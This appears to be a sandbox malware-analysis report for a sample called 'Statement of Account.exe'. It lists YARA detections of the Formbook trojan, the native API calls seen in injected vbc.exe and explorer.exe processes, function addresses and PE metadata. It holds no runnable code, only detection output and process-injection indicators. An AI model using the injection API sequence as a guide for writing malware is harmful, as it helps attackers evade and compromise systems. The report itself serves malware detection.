          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.4164670214.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1796732782.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.4165382872.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.4176622170.000000000E808000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1861222024.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: Statement of Account.exe PID: 6684, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: vbc.exe PID: 3756, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: NETSTAT.EXE PID: 4608, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: ipconfig.exe PID: 7108, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_0041A320 NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_0041A3D0 NtReadFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_0041A450 NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_0041A500 NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_0041A31B NtCreateFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_0041A44A NtClose
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_0041A4FA NtAllocateVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82DD0 NtDelayExecution, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82DF0 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82D10 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82D30 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82CA0 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82C70 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82FE0 NtCreateFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82F90 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82FB0 NtResumeThread, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82F30 NtCreateSection, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82E80 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82EA0 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82BF0 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82B60 NtClose, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82AD0 NtReadFile, LdrInitializeThunk
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C84650 NtSuspendThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C84340 NtSetContextThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82DB0 NtEnumerateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82D00 NtSetInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82CC0 NtQueryVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82CF0 NtOpenProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82C60 NtCreateKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82C00 NtQueryInformationProcess
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82FA0 NtQuerySection
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82F60 NtCreateProcessEx
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82EE0 NtQueueApcThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82E30 NtWriteVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82BE0 NtQueryValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82B80 NtQueryInformationFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82BA0 NtEnumerateValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82AF0 NtWriteFile
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C82AB0 NtWaitForSingleObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C835C0 NtCreateMutant
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C83090 NtSetValueKey
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C83010 NtOpenDirectoryObject
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C83D70 NtOpenThread
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C83D10 NtOpenProcessToken
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe; Code function: 6_2_05C839B0 NtGetContextThread
          Source: C:\Windows\explorer.exe; Code function: 7_2_0E7F0232 NtCreateFile
          Source: C:\Windows\explorer.exe; Code function: 7_2_0E7F1E12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exe; Code function: 7_2_0E7F1E0A NtProtectVirtualMemory
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C13FD26_2_05C13FD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C13FD56_2_05C13FD5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C51F926_2_05C51F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FFB16_2_05D0FFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FF096_2_05D0FF09
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C59EB06_2_05C59EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C599506_2_05C59950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6B9506_2_05C6B950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CE59106_2_05CE5910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C538E06_2_05C538E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CBD8006_2_05CBD800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C8DBF96_2_05C8DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC5BF06_2_05CC5BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C6FB806_2_05C6FB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FB766_2_05D0FB76
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CFDAC66_2_05CFDAC6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CEDAAC6_2_05CEDAAC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05C95AA06_2_05C95AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CF1AA36_2_05CF1AA3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D07A466_2_05D07A46
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05D0FA496_2_05D0FA49
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 6_2_05CC3A6C6_2_05CC3A6C
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A12327_2_0E5A1232
          Source: C:\Windows\explorer.exeCode function: 7_2_0E59BB307_2_0E59BB30
          Source: C:\Windows\explorer.exeCode function: 7_2_0E59BB327_2_0E59BB32
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A00367_2_0E5A0036
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5970827_2_0E597082
          Source: C:\Windows\explorer.exeCode function: 7_2_0E59E9127_2_0E59E912
          Source: C:\Windows\explorer.exeCode function: 7_2_0E598D027_2_0E598D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0E5A45CD7_2_0E5A45CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0E66A2327_2_0E66A232
          Source: C:\Windows\explorer.exeCode function: 7_2_0E664B327_2_0E664B32
          Source: C:\Windows\explorer.exeCode function: 7_2_0E664B307_2_0E664B30
          Source: C:\Windows\explorer.exeCode function: 7_2_0E6690367_2_0E669036
          Source: C:\Windows\explorer.exeCode function: 7_2_0E6600827_2_0E660082
          Source: C:\Windows\explorer.exeCode function: 7_2_0E661D027_2_0E661D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0E6679127_2_0E667912
          Source: C:\Windows\explorer.exeCode function: 7_2_0E66D5CD7_2_0E66D5CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F02327_2_0E7F0232
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7EF0367_2_0E7EF036
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7E60827_2_0E7E6082
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7EAB327_2_0E7EAB32
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7EAB307_2_0E7EAB30
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7ED9127_2_0E7ED912
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7E7D027_2_0E7E7D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0E7F35CD7_2_0E7F35CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E4B327_2_0F6E4B32
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E4B307_2_0F6E4B30
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6EA2327_2_0F6EA232
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E1D027_2_0F6E1D02
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E79127_2_0F6E7912
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6ED5CD7_2_0F6ED5CD
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E90367_2_0F6E9036
          Source: C:\Windows\explorer.exeCode function: 7_2_0F6E00827_2_0F6E0082
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_0171D3848_2_0171D384
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_075D0E888_2_075D0E88
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_075D0E788_2_075D0E78
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_07671D688_2_07671D68
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076794F88_2_076794F8
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076743A08_2_076743A0
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076719308_2_07671930
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076721A08_2_076721A0
          Source: C:\Users\user\AppData\Roaming\SIZfuXT.exeCode function: 8_2_076739A08_2_076739A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E053512_2_055E0535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E077012_2_055E0770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0560475012_2_05604750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FC6E012_2_055FC6E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D010012_2_055D0100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0562600012_2_05626000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EE3F012_2_055EE3F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_056602C012_2_056602C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EED7A12_2_055EED7A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EAD0012_2_055EAD00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E8DC012_2_055E8DC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055F8DBF12_2_055F8DBF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E0C0012_2_055E0C00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D0CF212_2_055D0CF2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05654F4012_2_05654F40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05622F2812_2_05622F28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05600F3012_2_05600F30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D2FC812_2_055D2FC8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0565EFA012_2_0565EFA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E0E5912_2_055E0E59
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055F2ED912_2_055F2ED9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055F696212_2_055F6962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EA84012_2_055EA840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0560E8F012_2_0560E8F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D28F012_2_055D28F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055C68F112_2_055C68F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0561889012_2_05618890
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E2A4512_2_055E2A45
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055DEA8012_2_055DEA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_056274E012_2_056274E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E349712_2_055E3497
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EB73012_2_055EB730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0561516C12_2_0561516C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055CF17212_2_055CF172
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055EB1B012_2_055EB1B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E33F312_2_055E33F3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FD2F012_2_055FD2F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E52A012_2_055E52A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E3D4012_2_055E3D40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FFDC012_2_055FFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05659C3212_2_05659C32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055F9C2012_2_055F9C20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E1F9212_2_055E1F92
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E9EB012_2_055E9EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E995012_2_055E9950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FB95012_2_055FB950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055D197912_2_055D1979
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E59DA12_2_055E59DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0564D80012_2_0564D800
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055E38E012_2_055E38E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05655BF012_2_05655BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_0561DBF912_2_0561DBF9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_055FFB8012_2_055FFB80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 12_2_05653A6C12_2_05653A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 05CBEA12 appears 86 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 05CCF290 appears 103 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 05C85130 appears 58 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 05C3B970 appears 262 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 0564EA12 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 05C97E54 appears 107 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: String function: 05627E54 appears 95 times
Source: Statement of Account.exe, 00000000.00000000.1699473233.0000000000B22000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameFEAG.exe" vs Statement of Account.exe
Source: Statement of Account.exe, 00000000.00000002.1735995485.0000000009250000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Statement of Account.exe
Source: Statement of Account.exe, 00000000.00000002.1730650191.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs Statement of Account.exe
Source: Statement of Account.exe, 00000000.00000002.1729055113.000000000106E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Statement of Account.exe
Source: Statement of Account.exe | Binary or memory string: OriginalFilenameFEAG.exe" vs Statement of Account.exe
Source: Statement of Account.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.4165059695.0000000003260000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
